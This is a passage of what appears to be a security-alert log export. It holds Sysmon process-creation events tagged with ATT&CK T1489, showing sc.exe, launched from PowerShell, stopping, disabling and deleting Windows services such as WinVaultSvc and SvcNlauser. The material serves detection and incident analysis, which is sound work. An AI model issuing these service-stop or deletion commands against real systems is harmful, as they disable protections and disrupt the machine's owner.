360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.072",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.836 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001028161e00} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.840191200Z"",""eventRecordID"":""2393"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.836\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001028161e00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.836"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001028161e00}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.025",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.784 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001067131e00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.787371700Z"",""eventRecordID"":""2390"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.784\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001067131e00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.784"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001067131e00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.012",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.769 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001092121e00} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.774824500Z"",""eventRecordID"":""2389"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.769\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001092121e00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.769"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001092121e00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.978",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.736 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010d7101e00} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.738737800Z"",""eventRecordID"":""2387"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.736\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010d7101e00}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.736"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010d7101e00}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.931",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.666 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010a10d1e00} +ProcessId: 7872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.669850200Z"",""eventRecordID"":""2384"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.666\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010a10d1e00}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.666"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010a10d1e00}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.900",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.632 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f80b1e00} +ProcessId: 7216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.639876200Z"",""eventRecordID"":""2382"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.632\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010f80b1e00}\r\nProcessId: 7216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.632"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010f80b1e00}"",""processId"":""7216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.872",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.616 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010fa0a1e00} +ProcessId: 7076 +Image: C:\Windows\System32\sc.exe 